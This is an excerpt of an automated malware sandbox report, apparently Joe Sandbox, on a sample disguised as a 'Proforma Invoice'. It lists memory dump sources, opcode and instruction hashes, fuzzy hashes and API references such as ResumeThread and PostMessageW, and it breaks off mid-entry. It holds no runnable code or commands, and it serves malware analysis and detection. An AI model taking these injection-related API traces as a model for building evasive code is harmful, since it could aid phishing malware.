                                                                                                  • Opcode ID: a62ff9c4be061074e44d2157297c7da11316d379000b471eb0c1236506f2d40c
                                                                                                  • Instruction ID: 26f75ad71ff33cf90474a704f0c62c5357c9dca587799053b23310c8f50fd4c0
                                                                                                  • Opcode Fuzzy Hash: a62ff9c4be061074e44d2157297c7da11316d379000b471eb0c1236506f2d40c
                                                                                                  • Instruction Fuzzy Hash: AA1167718002499FCB20DFAAC845BDEFFF5EF88320F108819E519A7250C775A544CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 947044025-4268484829
                                                                                                  • Opcode ID: e1943617b2b2d2b752187046758b68d8bbf8bb68173ed3f14fd12fd8a2b58617
                                                                                                  • Instruction ID: a7c734486654f8c8a1a4f5b1a2df59e1192bb5b909ea26b70114055a08a9d946
                                                                                                  • Opcode Fuzzy Hash: e1943617b2b2d2b752187046758b68d8bbf8bb68173ed3f14fd12fd8a2b58617
                                                                                                  • Instruction Fuzzy Hash: 4C116AB1D042498FDB20DFA9D4457EEFBF5EF88324F208419D419A7250C7786944CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 947044025-4268484829
                                                                                                  • Opcode ID: 288c43963b702b20f2f479a0ce2396c42d0790c1b48f4cc370e139c0c758d717
                                                                                                  • Instruction ID: ad74ba6ce7f042f315388bea9cdb6255fa790d3848d052d8b1549eb8c619dc5a
                                                                                                  • Opcode Fuzzy Hash: 288c43963b702b20f2f479a0ce2396c42d0790c1b48f4cc370e139c0c758d717
                                                                                                  • Instruction Fuzzy Hash: BB116AB1D002598FDB20DFA9D4457EEFBF4EF88324F208429D059A7250C7749944CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 050BDB6D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 410705778-4268484829
                                                                                                  • Opcode ID: b92f49c15b210463b1bc2b70cec95cb755831a648d04adaf9d19412e657dcfa1
                                                                                                  • Instruction ID: 5a509c02d8e54d17e7357422d1c6a3bc8d8b23f88b716c6f4763a0d6ad14532d
                                                                                                  • Opcode Fuzzy Hash: b92f49c15b210463b1bc2b70cec95cb755831a648d04adaf9d19412e657dcfa1
                                                                                                  • Instruction Fuzzy Hash: E41113B6800249DFDB10DF99D585BDEFBF8EB48320F108419E418A3600C375A584CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 947044025-4268484829
                                                                                                  • Opcode ID: 9180f59ab59d95508b1437126f9a5284e78fca90692c69537e7f14ec40a7edd3
                                                                                                  • Instruction ID: c04562f4c39e8f60c7e430783ef1a1b990e5606eb9f25cc4368539e9797d340a
                                                                                                  • Opcode Fuzzy Hash: 9180f59ab59d95508b1437126f9a5284e78fca90692c69537e7f14ec40a7edd3
                                                                                                  • Instruction Fuzzy Hash: DD1128B19002498FDB20DFAAD4457EEFBF8EF88324F248419D459A7250C675A944CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 050BDB6D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID: nCy
                                                                                                  • API String ID: 410705778-4268484829
                                                                                                  • Opcode ID: db13d2e4cc7476d1c7977856ecb58c596739d23c03f22ddef3bb53cd63247e3b
                                                                                                  • Instruction ID: 3e708ea1f2b35802cf3f74f86a66015dddb9f8c1b0d947ac184554ca2fd87fc4
                                                                                                  • Opcode Fuzzy Hash: db13d2e4cc7476d1c7977856ecb58c596739d23c03f22ddef3bb53cd63247e3b
                                                                                                  • Instruction Fuzzy Hash: 0E11E3B5800649DFDB10DF99D585BDEFBF8EB48320F108419E555A7200C375A944CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a4687fbe9af04e3efd9c2f3fcf66aec79283e43a3a5cbdf861d467916f34816
                                                                                                  • Instruction ID: 184b5edf9e2df7a17f045342870e1bcb7bbe55c30b0029e074d3c53c3c788a2a
                                                                                                  • Opcode Fuzzy Hash: 9a4687fbe9af04e3efd9c2f3fcf66aec79283e43a3a5cbdf861d467916f34816
                                                                                                  • Instruction Fuzzy Hash: 6C710074D05218CFDB80DFA8C984AEDFBB5FF49320F10A46AD815A7315D776998ACB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 977e8e8f3468d6ccdc7e81059e6523febd639d4152a0d295bdd3b56c03b17f26
                                                                                                  • Instruction ID: 8008d6205989a6114f9c6a98e6817ffe76ef9c2fe01302d13497ec871a8815f5
                                                                                                  • Opcode Fuzzy Hash: 977e8e8f3468d6ccdc7e81059e6523febd639d4152a0d295bdd3b56c03b17f26
                                                                                                  • Instruction Fuzzy Hash: 5C412AB8909209CFD784CF6ADA409FEB7F9FF8D320B51A0A8D409A7255D732D912CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 97d6a60993d9746dc6d7079b9c86e749d6ff1d5368c1e368f7fc809c9bb4fdb8
                                                                                                  • Instruction ID: 3e94ddbc82c4dc7dedd381f582613f4a64e5b4f501826ee342b7380520665048
                                                                                                  • Opcode Fuzzy Hash: 97d6a60993d9746dc6d7079b9c86e749d6ff1d5368c1e368f7fc809c9bb4fdb8
                                                                                                  • Instruction Fuzzy Hash: 0D412974D48208DFDB40CFA5D984AEEBBB5FF89320F00A029E405A7350D7719941CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 70907a781532758576e2cea9be6b7cb37e7081f449fd78e4c63250583c913d83
                                                                                                  • Instruction ID: 0500cbb1fdc6b65bd6a473bbda642496a80d3980ab6e7f9f120c87d9e0c9bf61
                                                                                                  • Opcode Fuzzy Hash: 70907a781532758576e2cea9be6b7cb37e7081f449fd78e4c63250583c913d83
                                                                                                  • Instruction Fuzzy Hash: F231D178905218CFDB80CF95DAA4AEEBBF4FB8D320F1060A9D449A7355C7769911CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4cd127aca385791254b5e352fb970c75f1a999c851abcb4c63e3d5fcb32f30e0
                                                                                                  • Instruction ID: 1ab8d66b0798d8e43efcac15a74ad5a95b51a8641ede271db3e0139de4c4d7f5
                                                                                                  • Opcode Fuzzy Hash: 4cd127aca385791254b5e352fb970c75f1a999c851abcb4c63e3d5fcb32f30e0
                                                                                                  • Instruction Fuzzy Hash: 3231A275E002199FCB08DFA9C9406EEBBF6BF88310F10842AE415B7364EB3559468B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2ae1e12a92f792e6d4792f0d159d3e53bfeb3458c9de43ebdd467da76fcbeb9d
                                                                                                  • Instruction ID: 6fd6e3931f861fc6367759669c93776cdf288efb929fe4f64c139a602f8300e9
                                                                                                  • Opcode Fuzzy Hash: 2ae1e12a92f792e6d4792f0d159d3e53bfeb3458c9de43ebdd467da76fcbeb9d
                                                                                                  • Instruction Fuzzy Hash: EE2104B5544200EFDB04DF18E9C0B66BFA9FB84314F24C66DD8094F297D33AD846CAA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a73a28c4b2c73ccb721d15291eb0ca30d7428219e18cfc3a30f17d70b0e09752
                                                                                                  • Instruction ID: d30a6d334ca5f7eb45af4d9d48eb7c7b2923d838be1123d9e2fdf92ad4ad3a7d
                                                                                                  • Opcode Fuzzy Hash: a73a28c4b2c73ccb721d15291eb0ca30d7428219e18cfc3a30f17d70b0e09752
                                                                                                  • Instruction Fuzzy Hash: AC210471504280EFDB05DF14D9C0BA6BFA9FB84314F20C66DE8094B297D336D846CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bfaf6193e9fb44633cf5c3220d3925ad4f32a06d96a28e26944b9702a6510304
                                                                                                  • Instruction ID: 0f3abe0560d82b0347da4185c803ee63b2af717ed416defadfe24856a67a431f
                                                                                                  • Opcode Fuzzy Hash: bfaf6193e9fb44633cf5c3220d3925ad4f32a06d96a28e26944b9702a6510304
                                                                                                  • Instruction Fuzzy Hash: B82155B4E00319DFCB44DFA9C584AAEBBB1FB88314F14D16AC404A7354D7349A82CF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction ID: 38fb59c395fc6ce62803b22ca18d7e7999d00cfb1b536acf2dbf8c66c50679b3
                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction Fuzzy Hash: 9611BB75504280DFCB02CF10C5C4B95BFA1FB84314F24C6AAD8494B296C33AD80ACB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684577221.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_abd000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction ID: 137bd78da2eda02ac566a270c65eb5d0894e281c6419be6a4310c64cc6cb980e
                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction Fuzzy Hash: 3A118B75504280DFDB05CF14E9C4B55BFA2FB84314F28C6AAD8494B656C33AD84ACBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684506961.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_aad000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1deb5a6a7d6b8736a987bc65454f69f3e14751344549a9c15cd32293032dfad2
                                                                                                  • Instruction ID: 3f2d5e83462cb47ab761573345171d04b2eb97b3cf2cb059cd474522ca93624e
                                                                                                  • Opcode Fuzzy Hash: 1deb5a6a7d6b8736a987bc65454f69f3e14751344549a9c15cd32293032dfad2
                                                                                                  • Instruction Fuzzy Hash: 5C012B310083409AE7144F25CD84B67FFA8EF42324F18C52AED4A0F6D6D739D840C671
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1684506961.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_aad000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f455809b7cfc4811535a157376c3d6aa3cf0a52864dcbf238ac660a46f16d4c
                                                                                                  • Instruction ID: 841112b7b2b6a34b95d5e1323284434ec54260acd145bda1632c2cb8ef21c745
                                                                                                  • Opcode Fuzzy Hash: 0f455809b7cfc4811535a157376c3d6aa3cf0a52864dcbf238ac660a46f16d4c
                                                                                                  • Instruction Fuzzy Hash: 8DF0CD71008340AAE7148F1AC888B62FFA8EB92734F18C45AED490F296C3799844CBB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f94ae68960bffcae3a16ca723f9c8f713f26bddd1cba39e1d7215b4703ec51b4
                                                                                                  • Instruction ID: 93425f8c319d05940b13bcd08b33b6419e534477878084d077fab3a9c8b63e8c
                                                                                                  • Opcode Fuzzy Hash: f94ae68960bffcae3a16ca723f9c8f713f26bddd1cba39e1d7215b4703ec51b4
                                                                                                  • Instruction Fuzzy Hash: 66F03074D08309EFDB80DFADDA442ECBBB8AF49310F10A0BD9409A3201D6310A41CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e23fbfe1b1735ddfcb9fee16dd60438c9f35ecd6ba6de851447b9c2b233b2cc
                                                                                                  • Instruction ID: faa010f64a7ba715c16871b953754d9cf42c0fa584545722a5a22cb6988abdd9
                                                                                                  • Opcode Fuzzy Hash: 3e23fbfe1b1735ddfcb9fee16dd60438c9f35ecd6ba6de851447b9c2b233b2cc
                                                                                                  • Instruction Fuzzy Hash: CBE0ED74E04208EFC784DFE8D5506ACBBF4EB88314F10C0A9980893340D6359E42CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bcfbf57f9ad4aea056842079e8c562297ad67f1c126fe86c738201472d7f82f7
                                                                                                  • Instruction ID: d41e81cc57588bc42ae20d1618406b110274fa3cb4e10e72fb29ffede3c347ce
                                                                                                  • Opcode Fuzzy Hash: bcfbf57f9ad4aea056842079e8c562297ad67f1c126fe86c738201472d7f82f7
                                                                                                  • Instruction Fuzzy Hash: 93E0E574E04208EFCB84DFE8D5416ACBBF5EB88324F10C5E9981993341DB359A02CF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 542913f030040b48112c45c72dd4f8bca772af873d8801f0290eb382f39cbf01
                                                                                                  • Instruction ID: b21f2d1df1b0951946d5b2bbfe85fc808084ee3062a36f528f1f4532501728dd
                                                                                                  • Opcode Fuzzy Hash: 542913f030040b48112c45c72dd4f8bca772af873d8801f0290eb382f39cbf01
                                                                                                  • Instruction Fuzzy Hash: F4E08C7484520CDFD740DFF9A6095AE7BF9EB89224F0054A9A00A93220EB319A01D791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65399dde0a11fef29bf34cad5120355c7db9c27a3caec4a1170b62084d0a5e70
                                                                                                  • Instruction ID: 2cbec7394b51402ca77ec6e6e63a1b21fc756bd63ddd22b6f0491be812272007
                                                                                                  • Opcode Fuzzy Hash: 65399dde0a11fef29bf34cad5120355c7db9c27a3caec4a1170b62084d0a5e70
                                                                                                  • Instruction Fuzzy Hash: 2DE0EC78D15209DFC780EFA8D9456EDBBB5EB44215F2051B9980893340EB715F92CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'^q
                                                                                                  • API String ID: 0-1614139903
                                                                                                  • Opcode ID: 96aa157b933aab815cf860fc7aa1383ff8888048a92081f88b70f2855a0ec6c9
                                                                                                  • Instruction ID: a76c9263f1d36009921ce0c3ac584a4845ae3423b5c4bc7af4781be55c316008
                                                                                                  • Opcode Fuzzy Hash: 96aa157b933aab815cf860fc7aa1383ff8888048a92081f88b70f2855a0ec6c9
                                                                                                  • Instruction Fuzzy Hash: CC611B71A112088FDB48DF7AE960A9ABBF7FBC8300F14C57AD00597368EB74594A9B41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1690859952.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: /
                                                                                                  • API String ID: 0-2043925204
                                                                                                  • Opcode ID: 5a2acc2c0916aa8f29fb1dfe735617ca0bce7fe8acdfac461a5acbc4e62c0e09
                                                                                                  • Instruction ID: 8e1277c7695fb17b98be1a557df57e5e3e07456a61d051870b0e799a8059891d
                                                                                                  • Opcode Fuzzy Hash: 5a2acc2c0916aa8f29fb1dfe735617ca0bce7fe8acdfac461a5acbc4e62c0e09
                                                                                                  • Instruction Fuzzy Hash: BF415F71E05A588BEB6CCF6B8D4069BFAF7AFC9311F14D1B9941CAB259DB3005828E11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0213ab72d12044d99781b86795699d1822c283a41f63b67a984431a5e264e3a2
                                                                                                  • Instruction ID: 6e95ec6edd9b7158557cad05453ba5452692daf03a1813a2d259a32555225ffb
                                                                                                  • Opcode Fuzzy Hash: 0213ab72d12044d99781b86795699d1822c283a41f63b67a984431a5e264e3a2
                                                                                                  • Instruction Fuzzy Hash: D5D1AC707047018FEB29EB75E8907EEB7EBAF88700F14886ED5469B2A0CB75E841C751
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd5796acba7e4b4e3669394824ed31dca7e1a19f5c71d8810514154e9451e86f
                                                                                                  • Instruction ID: 538586d2042e8b2da6291774388bbc66199b3c63ccb82866fddd2d9aee9ffa41
                                                                                                  • Opcode Fuzzy Hash: dd5796acba7e4b4e3669394824ed31dca7e1a19f5c71d8810514154e9451e86f
                                                                                                  • Instruction Fuzzy Hash: 8DE11A74E002198FDB14DFA9D5809AEFBF2FF88304F24816AD815AB356D771A942CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe049da9c9b2a64a40a15ecf1ea3017284e4accb63412f033f1431ff087f1c76
                                                                                                  • Instruction ID: a52b0e4ff4363e1f944fbce7aa926b6c94a5bf6005d26c49f3456f3a6ec04340
                                                                                                  • Opcode Fuzzy Hash: fe049da9c9b2a64a40a15ecf1ea3017284e4accb63412f033f1431ff087f1c76
                                                                                                  • Instruction Fuzzy Hash: 8FE1F974E002198FDB14DFA9D5809AEBBF2FF89304F24C16AD814AB366D771A941CF61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 756462539ed99187ebb6d8b446d9610a5fe613c2688174466bf0f6ca66c6e4c0
                                                                                                  • Instruction ID: 225dbfa7eafc326cfcc1f8e7c0b26be418d77964f0c8d3678f0adb0eacad3635
                                                                                                  • Opcode Fuzzy Hash: 756462539ed99187ebb6d8b446d9610a5fe613c2688174466bf0f6ca66c6e4c0
                                                                                                  • Instruction Fuzzy Hash: 3DE10A74E042198FDB14DFA9D5809AEFBF2FF89304F24816AE814A7356D771A942CF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1689858694.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_50b0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9c9ec6e6a820723c54b69df182a1dba73d3f614716704eb9f65220bad94d30c2
                                                                                                  • Instruction ID: eb8a55362064fcaa93bdb40d709f045cc7b09a2e6286a8e1342bf9362bff7e99
                                                                                                  • Opcode Fuzzy Hash: 9c9ec6e6a820723c54b69df182a1dba73d3f614716704eb9f65220bad94d30c2
